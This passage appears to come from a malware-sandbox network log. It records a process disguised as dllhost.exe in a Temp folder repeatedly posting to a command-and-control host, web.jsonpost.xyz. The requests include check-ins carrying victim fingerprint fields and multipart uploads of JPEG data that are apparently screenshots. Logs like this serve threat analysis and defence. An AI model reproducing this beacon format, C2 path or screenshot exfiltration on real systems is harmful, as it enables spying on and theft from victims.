                                                                                Nov 29, 2024 01:52:52.460253954 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:52.460386038 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:52.579907894 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:52.579922915 CET2472OUTData Raw: 48 d2 29 c1 21 77 6d 0b 90 70 0a 93 8e f9 e6 b6 2e a3 8e 2d 6a f2 d6 de e6 d1 d5 75 28 ec 44 29 33 b3 40 d2 13 e5 ef 24 63 9c 1e 85 b1 d0 e0 f1 59 17 d0 de dd d8 cf 6f 25 95 93 dc 4c 81 1e f7 e7 59 1c 0e ec 03 6c 2d 8e 37 6d cf 7c e7 9a ae 6d b5
                                                                                Data Ascii: H)!wmp.-ju(D)3@$cYo%LYl-7m|m\]jj2ob|w,r:9qqqk=WsyfOknl%G7"($rFml1\\C#32Ac]ic8bmlen(`($I
                                                                                Nov 29, 2024 01:52:52.579969883 CET2472OUTData Raw: 1d 09 af 3b db 62 7f e7 e3 ff 00 c0 bf e0 9e c7 d5 70 7f f3 e9 7f e0 3f f0 0f 2f d4 74 eb 8d 32 ed ad ae 17 0c bd 08 e8 c3 d4 55 4a ed bc 51 02 cd e1 9b 2d 4c 5d 4f 32 ce 63 68 c4 c9 18 2a ae a5 bf 84 75 e9 df 15 c4 d7 d1 e0 71 12 af 4a f3 5a a7
                                                                                Data Ascii: ;bp?/t2UJQ-L]O2ch*uqJZcs\$0iu((JZ(QE%QEQELQEQEQEJ(@)(QAQECEPIKI%-%;QEQIK@QEE0(%-(0J(J)))i(-%R)


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                67192.168.2.44980372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:52.905103922 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                68192.168.2.44980472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:53.901676893 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----88c41d18d04efae2b058311875d35af8
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 99423
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:53.901699066 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 38 38 63 34 31 64 31 38 64 30 34 65 66 61 65 32 62 30 35 38 33 31 31 38 37 35 64 33 35 61 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------88c41d18d04efae2b058311875d35af8Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:53.901760101 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:53.901781082 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:54.024043083 CET9888OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:54.024070978 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:54.024084091 CET6180OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:54.024105072 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:54.144323111 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:54.144408941 CET2472OUTData Raw: 1d 09 af 3b db 62 7f e7 e3 ff 00 c0 bf e0 9e c7 d5 70 7f f3 e9 7f e0 3f f0 0f 2f d4 74 eb 8d 32 ed ad ae 17 0c bd 08 e8 c3 d4 55 4a ed bc 51 02 cd e1 9b 2d 4c 5d 4f 32 ce 63 68 c4 c9 18 2a ae a5 bf 84 75 e9 df 15 c4 d7 d1 e0 71 12 af 4a f3 5a a7
                                                                                Data Ascii: ;bp?/t2UJQ-L]O2ch*uqJZcs\$0iu((JZ(QE%QEQELQEQEQEJ(@)(QAQECEPIKI%-%;QEQIK@QEE0(%-(0J(J)))i(-%R)
                                                                                Nov 29, 2024 01:52:54.144428968 CET2472OUTData Raw: 18 1e f5 f1 d4 f2 0a f4 6b cd c5 a7 17 b3 fd 3d 4f b9 8f 11 e1 a7 46 1c e9 a9 75 5f af a7 e2 7a 5d cb 28 8a 72 c4 60 48 b9 cf 6f bb 55 35 d6 56 f0 de a0 54 82 3c 86 e4 7d 2b 93 b8 f1 9c 73 68 b7 10 c1 1c d6 d7 ae 55 91 8b f9 8b 90 57 3c 9e 7a 0a
                                                                                Data Ascii: k=OFu_z](r`HoU5VT<}+shUW<z`~e~e&fN+;8'{WQE|:U\k!u<N1czaFurA]Q]QQCG'T`g|


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                69192.168.2.44980672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:54.374226093 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                70192.168.2.44980872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:55.377326965 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:55.377355099 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:55.377420902 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:55.377444983 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:55.497634888 CET6180OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:55.497662067 CET3708OUTData Raw: e8 00 ee 6a e2 b0 61 90 7a 1c 1a f5 70 b4 e7 4d 35 52 57 6d dc f1 31 b5 a9 d6 6a 54 a1 ca 92 b0 54 37 4f b2 d9 dc 82 40 c1 20 75 23 3c d4 d4 10 08 c1 19 06 ba 9a ba b1 c5 17 66 99 14 d6 9a 84 1a c6 ad ae dd ad c3 e9 63 ed 0e f7 58 26 dd ed 0a 90
                                                                                Data Ascii: jazpM5RWm1jTT7O@ u#<fcX&UBp01zUOiR>mY\82ON@LK{{K`.FGY$-GyYU{$Fmv";rOuqglg[Gresdju$Gk'6
                                                                                Nov 29, 2024 01:52:55.497730970 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:55.497773886 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:55.497803926 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:55.497914076 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:55.617830992 CET7416OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                71192.168.2.44980972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:56.008167028 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                72192.168.2.44981072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:56.966182947 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:56.966233969 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:56.966339111 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:56.966414928 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:57.086420059 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:57.086556911 CET7416OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:57.086677074 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:57.086709023 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:57.086929083 CET6180OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:57.206456900 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:57.206554890 CET4944OUTData Raw: 48 d2 29 c1 21 77 6d 0b 90 70 0a 93 8e f9 e6 b6 2e a3 8e 2d 6a f2 d6 de e6 d1 d5 75 28 ec 44 29 33 b3 40 d2 13 e5 ef 24 63 9c 1e 85 b1 d0 e0 f1 59 17 d0 de dd d8 cf 6f 25 95 93 dc 4c 81 1e f7 e7 59 1c 0e ec 03 6c 2d 8e 37 6d cf 7c e7 9a ae 6d b5
                                                                                Data Ascii: H)!wmp.-ju(D)3@$cYo%LYl-7m|m\]jj2ob|w,r:9qqqk=WsyfOknl%G7"($rFml1\\C#32Ac]ic8bmlen(`($I


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                73192.168.2.44981672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:57.378237009 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                74192.168.2.44981772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:58.548974037 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
